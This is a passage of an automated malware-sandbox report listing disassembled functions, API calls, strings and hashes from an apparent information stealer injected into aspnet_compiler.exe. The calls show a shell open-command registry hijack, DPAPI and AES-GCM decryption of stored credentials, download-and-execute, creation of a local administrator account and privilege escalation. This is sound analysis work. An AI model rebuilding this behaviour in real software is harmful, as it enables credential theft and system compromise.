                                                                            • ExitProcess.KERNEL32 ref: 004060E0
                                                                            Strings
                                                                            • USER32.DLL, xrefs: 004060B0
                                                                            • PureCall, xrefs: 004060D0
                                                                            • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                                                            • MessageBoxA, xrefs: 004060BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressExitLibraryLoadProcProcess
                                                                            • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                                            • API String ID: 881411216-4134947204
                                                                            • Opcode ID: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                                                            • Instruction ID: bd81d5c7f3da7a5dda9c96caca806214e81eb27f708d7e513293adb5dabf46c5
                                                                            • Opcode Fuzzy Hash: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                                                            • Instruction Fuzzy Hash: 04D0C2303C83016AE6103BA0AD4EF9636355B04B51F244962B605A51D1DAE99592D56D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                                                            • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                                                            • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                                                            • SetLastError.KERNEL32(00000000), ref: 00412F02
                                                                            Strings
                                                                            • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                                            • String ID: Software\Classes\Folder\shell\open\command
                                                                            • API String ID: 1473660444-2536721355
                                                                            • Opcode ID: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                                                            • Instruction ID: 82a2526e36d2d6463d42065251312d8bdf4d9f0b426d0c692092d159b657fe2b
                                                                            • Opcode Fuzzy Hash: f4a9b6598db950cac999bcfd18d51eb7d783ea20bfab151884b3b51fb57c84b6
                                                                            • Instruction Fuzzy Hash: C5011A71905228AADF209BA19D49FDFBFBDEF09750F004122FA05F2140D7B49685DAA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C419 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                                                            • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                                                            • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                                            • String ID: AES$ChainingMode$ChainingModeGCM
                                                                            • API String ID: 1692524283-1213888626
                                                                            • Opcode ID: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                                                            • Instruction ID: c2b106cd844a06e10b1a571c349fc797866018eb450a69ea0d76d9719a4b7e57
                                                                            • Opcode Fuzzy Hash: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                                                            • Instruction Fuzzy Hash: 2FF06871345325BFDB240B56DC49ED7BFACEF5AB91B10413AF905E1150D6B15C00D6A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C6BD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                                                            • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • LocalFree.KERNEL32(?), ref: 0040C7FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                                            • String ID: 0$v1
                                                                            • API String ID: 4131498132-3331332043
                                                                            • Opcode ID: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                                                            • Instruction ID: 2970a0a6e6da2b46dc71b506d453e3d8838dace9638eca7dbf8707eb64b33263
                                                                            • Opcode Fuzzy Hash: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                                                            • Instruction Fuzzy Hash: 064160B2D00108BBDB01ABD5DC85EEFB7BCEF44344F14813BF911A2290E7389A458B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041405F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                                                            • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                                                            • Process32Next.KERNEL32 ref: 004140C2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID: explorer.exe
                                                                            • API String ID: 420147892-3187896405
                                                                            • Opcode ID: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                                                            • Instruction ID: ea809b74c35a4b4e8447ab93d020d769017f33877584137915eab964d6a7a943
                                                                            • Opcode Fuzzy Hash: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                                                            • Instruction Fuzzy Hash: CB01A972505114ABD7209761EC09FDB77FCDF49310F1040B6FA45E21C0EA78DAD58A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409D97 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,-00000001,77C2E730,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                                                            • lstrcpyW.KERNEL32 ref: 00409E22
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                                            • String ID: Could not decrypt
                                                                            • API String ID: 3112367126-1484008118
                                                                            • Opcode ID: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                                                            • Instruction ID: aa4716c66a3a11094124d3c9fea6a44173f7715366435e59aa3e46d54874a9c7
                                                                            • Opcode Fuzzy Hash: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                                                            • Instruction Fuzzy Hash: 6E11C676904219ABC711CB99C8809EFF7BCEF88704B1045BBE955F7292E6359E01CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410A8C Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                                                            • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                                                            • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                                                            • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                                            • String ID:
                                                                            • API String ID: 1866703397-0
                                                                            • Opcode ID: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                                                            • Instruction ID: 268544a994eea4337760f271e77acc5a4e560188a377bc451064b1715e62684d
                                                                            • Opcode Fuzzy Hash: a99fe88b912b9a90b46e4a78fd4ea3cd93b49c87cff4e41624bf92df729e9547
                                                                            • Instruction Fuzzy Hash: 0C11FE71A0020DABDB10DFD0DC89EEFB7BCEB08344F004476F205E2190D7749A849B65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C3B9 Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                            • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                            • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 4291131564-0
                                                                            • Opcode ID: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                                                            • Instruction ID: 97c3cc2928edf4510a7e7d2c17aa5025b134dfc6b4fce315ddd3b78eefc3bfdb
                                                                            • Opcode Fuzzy Hash: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                                                            • Instruction Fuzzy Hash: A6011D71641231BFD7214B569C49EA7BFACEF497E0B108131F948E6290D7B18D00DAA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040290E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?,?,00402969,?,?,00000000,004176A4), ref: 00403639
                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                                            • String ID: open
                                                                            • API String ID: 4166385161-2758837156
                                                                            • Opcode ID: b0762403b2d91bfb88fbe44fb891d925d8c2b106f0e00baab9292d2abc2de8c6
                                                                            • Instruction ID: 7d7fc589e9963d25af6e0cc8dd23fda473545fd51eb9e29652c6e1dbcd1770d4
                                                                            • Opcode Fuzzy Hash: b0762403b2d91bfb88fbe44fb891d925d8c2b106f0e00baab9292d2abc2de8c6
                                                                            • Instruction Fuzzy Hash: 18214F71A00108BBCB15AFA6C885EEE7B78EF84759F00406AF416772C1DB785645CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040EDA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                                                            • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentInformationQuery
                                                                            • String ID: `@
                                                                            • API String ID: 3953534283-951712118
                                                                            • Opcode ID: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                                                            • Instruction ID: 3ac64283fd91789c4a21a164da3f73717bcde32abe73c1a33020f5e4c519176d
                                                                            • Opcode Fuzzy Hash: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                                                            • Instruction Fuzzy Hash: C0016171E00219AFDB04CF96D8848AFB7B9EB44351B10447AE511B7280D7745E54CFE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041154A Relevance: 4.6, APIs: 3, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,77C30770,00000000,00405B72), ref: 0040609C
                                                                              • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                                                            • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0041157F
                                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004115A6
                                                                            • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004115D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                                            • String ID:
                                                                            • API String ID: 2408535517-0
                                                                            • Opcode ID: 8e519ccb36f9d6e2fd7dd1da6308645ce785dcb158054de0ceb516f49e33b230
                                                                            • Instruction ID: 005d507b96d77ad3cbaae5a347880d44af72ce3ccef8451c39d33109e0eb80f3
                                                                            • Opcode Fuzzy Hash: 8e519ccb36f9d6e2fd7dd1da6308645ce785dcb158054de0ceb516f49e33b230
                                                                            • Instruction Fuzzy Hash: 2F318471E00219ABCF14EFA5D5869EFB7B8EF44305F10007EE502B7291DB785E418BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A8C3 Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?,0040A1B0,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040A8E0
                                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040A90E
                                                                              • Part of subcall function 00405FFA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 0040A95B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                                            • String ID:
                                                                            • API String ID: 573875632-0
                                                                            • Opcode ID: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                                                            • Instruction ID: 46e43b13d17251deba087c8a1c7344e77a636f034bd5f4a2403ed6c43e9bde0d
                                                                            • Opcode Fuzzy Hash: a7fcee0eccf1bffdf81db819550e444e68a458b4b19a0c296c275230d11a1816
                                                                            • Instruction Fuzzy Hash: D811D6B6D00209AFCB01DFA5D8848EEBBB8EF08344F1080BAF509A2251D7359A05CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410B38 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0040E02E), ref: 00410B63
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 00410B74
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 00410BA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                                            • String ID:
                                                                            • API String ID: 658607936-0
                                                                            • Opcode ID: 5d8002782d6cb3d350cec1e8e84b60f7c7373c5849221902a353ab35b60b3b18
                                                                            • Instruction ID: 67c9ee84cc9af8955d78051c56a76bc756380ec0b548f9a68ba81219f5d72a25
                                                                            • Opcode Fuzzy Hash: 5d8002782d6cb3d350cec1e8e84b60f7c7373c5849221902a353ab35b60b3b18
                                                                            • Instruction Fuzzy Hash: 99111C75A14319AFEB11CFE5CC849EFFBBCFB48744F10456AE501F2250E6B4AA448BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C261 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040C289
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2A0
                                                                            • LocalFree.KERNEL32(0040C23A,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                            • String ID:
                                                                            • API String ID: 2068576380-0
                                                                            • Opcode ID: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                                                            • Instruction ID: 1d902f39b8868da73aad002a3a3bcb34f53c3eebdb7f7a81f2f30e2d950ee71b
                                                                            • Opcode Fuzzy Hash: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                                                            • Instruction Fuzzy Hash: 4C0108B9900209AFDB059FA4DC4A8EFBBB9EB48310B10016EFD41A2350E7759A448AA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411446 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 00411515
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            • Opcode ID: bb2bbd0ad6a7daaed3b05fb8421f2e4888ae6f6de63b7a4e3cfdcad92c2b92ff
                                                                            • Instruction ID: 3bc00f6ecbb92e03070013b76739fb9faa3866cd32c5f18363a362d6e3315d9a
                                                                            • Opcode Fuzzy Hash: bb2bbd0ad6a7daaed3b05fb8421f2e4888ae6f6de63b7a4e3cfdcad92c2b92ff
                                                                            • Instruction Fuzzy Hash: FF315071D00209ABCB10EFA5C989BEEBBB9EF44315F10416EE505B3290DB789A84CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D2B8 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0055AD78,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D2FA
                                                                              • Part of subcall function 00410A8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                                                              • Part of subcall function 00410A8C: LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                                                              • Part of subcall function 00410A8C: GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                                                              • Part of subcall function 00410A8C: FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                                                            • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D31B
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 188019324-0
                                                                            • Opcode ID: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                                                            • Instruction ID: 387118251825923e10dc775986f69852a0c78a11b32ac12897eb8a3676ac3e91
                                                                            • Opcode Fuzzy Hash: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                                                            • Instruction Fuzzy Hash: 56112E72D00208AFDB11DFA9C8849EEB7F8FF58354B00842BF951E7250D7B49A458B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00426222 Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                                            • Instruction ID: 2f4a3529709998775fb1cfce15acb4dc74d0562c3152b173c983c6aefab5c3d4
                                                                            • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                                            • Instruction Fuzzy Hash: F0317976F0062ADFCB04DF98D8909AEB7F5BF89314B6681AAD401A7311D234E941CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410E5E Relevance: .1, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                                                            • Instruction ID: 82469f1c0b68b0bbf684dc2258c46a30b897b832454fe873a7492cc4e91153ea
                                                                            • Opcode Fuzzy Hash: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                                                            • Instruction Fuzzy Hash: 8021D871E002099BDB11DF99CC82AEFBBB8EF44314F14447BE605FB241E67469C58BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041EB27 Relevance: .1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                            • Instruction ID: 252c24ed45863d0043dcfa88564879008cf283e5d062384433913211211ca2ab
                                                                            • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                            • Instruction Fuzzy Hash: E331E63AA0834A8FC710DF19C480967B7E5FF89314F4909AEE99687312D334F986CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411B3F Relevance: .0, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
